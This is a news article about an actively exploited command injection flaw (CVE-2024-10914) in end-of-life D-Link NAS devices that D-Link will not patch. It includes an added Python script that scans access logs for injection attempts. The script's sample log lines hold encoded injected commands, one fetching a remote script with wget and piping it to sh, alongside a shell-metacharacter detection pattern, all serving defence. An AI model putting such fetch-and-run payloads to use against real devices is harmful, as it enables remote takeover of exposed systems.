Attackers are now exploiting a critical-severity vulnerability, for which exploit code is publicly available, that affects several models of end-of-life D-Link network-attached storage (NAS) devices.
The command injection flaw, tracked as CVE-2024-10914, was discovered by security researcher Netsecfish, who published exploitation details and said that unauthenticated attackers can use it to inject arbitrary shell commands by sending crafted HTTP GET requests to NAS devices exposed on the Internet.
The affected models and firmware versions are DNS-320 Version 1.00, DNS-320LW Version 1.01.0914.2012, DNS-325 Versions 1.01 and 1.02, and DNS-340L Version 1.08.
The attacks began days after D-Link announced on Friday that it would not patch the vulnerability because it only affects end-of-life NAS devices; the company warned customers to retire the affected devices or replace them with newer models.
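As an added example (not code from the article or from Netsecfish's writeup), the following Python script scans web-server access logs in Common Log Format for GET requests whose query-string values carry shell metacharacters, including double-percent-encoded ones, which is the shape of request the paragraph above describes. The article does not name the vulnerable CGI endpoint, so the check keys on the payload rather than on a path; the `/cgi-bin/example.cgi` path, the assumed log format, and the sample log lines are constructed placeholders.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Shell metacharacters that should never appear in a value sent to a NAS
# management CGI: command separators, pipes, backticks, command substitution,
# and raw newlines (what %0a/%0d become after decoding).
SHELL_META = re.compile(r"[;|`\r\n]|&&|\$[({]")

# Common Log Format as emitted by most embedded web servers and by reverse
# proxies in front of them (assumed format; adjust the pattern to your logs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines. /cgi-bin/example.cgi is a placeholder, not the
# real endpoint; the article does not name it. The last line carries a
# double-encoded payload (%253B -> %3B -> ;).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2024:03:14:07 +0000] "GET /cgi-bin/example.cgi?cmd=list&name=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh%7Csh HTTP/1.1" 200 512
198.51.100.22 - - [11/Nov/2024:03:15:01 +0000] "GET /cgi-bin/example.cgi?cmd=list&name=alice HTTP/1.1" 200 512
192.0.2.5 - - [11/Nov/2024:03:16:30 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.7 - - [11/Nov/2024:03:17:45 +0000] "GET /cgi-bin/example.cgi?cmd=list&name=%253Bid%2520%253E%2520%252Ftmp%252Fo HTTP/1.1" 200 512
"""


def suspicious_params(target: str) -> list[tuple[str, str]]:
    """Return (param, decoded_value) pairs whose value contains shell metacharacters.

    parse_qsl performs one round of percent-decoding; the extra unquote()
    catches double-encoded payloads, a common trick for slipping past
    naive filters that only decode once.
    """
    hits = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            hits.append((key, decoded))
    return hits


def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one finding per suspicious GET request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['target']}")
        for key, value in f["params"]:
            print(f"    {key} = {value!r}")
```

Run it against a real file with `scan_log(open(path).read())`. Because the NAS itself may not keep usable logs, the practical place to run this is the access log of whatever sits in front of it (router, reverse proxy, or firewall with HTTP logging). Expect some false positives on legitimate values that contain `|` or backticks; the script is a triage aid for spotting exposure, not a substitute for taking these devices off the Internet.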
“D-Link does not provide software updates, security patches, or technical support for products that have reached their End of Life (EOL) or End of Sale (EOS),” D-Link said.
The vulnerability did not stay unexploited for long: threat actors began targeting it as early as Monday, according to the Shadowserver threat monitoring service.
Netsecfish had also previously disclosed a hard-coded backdoor and an arbitrary command injection vulnerability (tracked as CVE-2024-3273) affecting roughly the same set of D-Link NAS models; chained together, the two flaws give an attacker remote code execution on the device. Users of these end-of-life devices should therefore cut them off from the Internet as soon as possible, especially since these models have previously been targeted in ransomware attacks.
“In the majority of cases, D-Link is unable to patch device or firmware vulnerabilities in these devices because all development and support on these devices have been discontinued,” the company said on Friday.
“D-Link strongly recommends retiring this product and cautions that continued use may be a risk to devices connected to it. If US owners decide to continue using these devices despite D-Link’s recommendation, please verify the device is using the latest firmware.”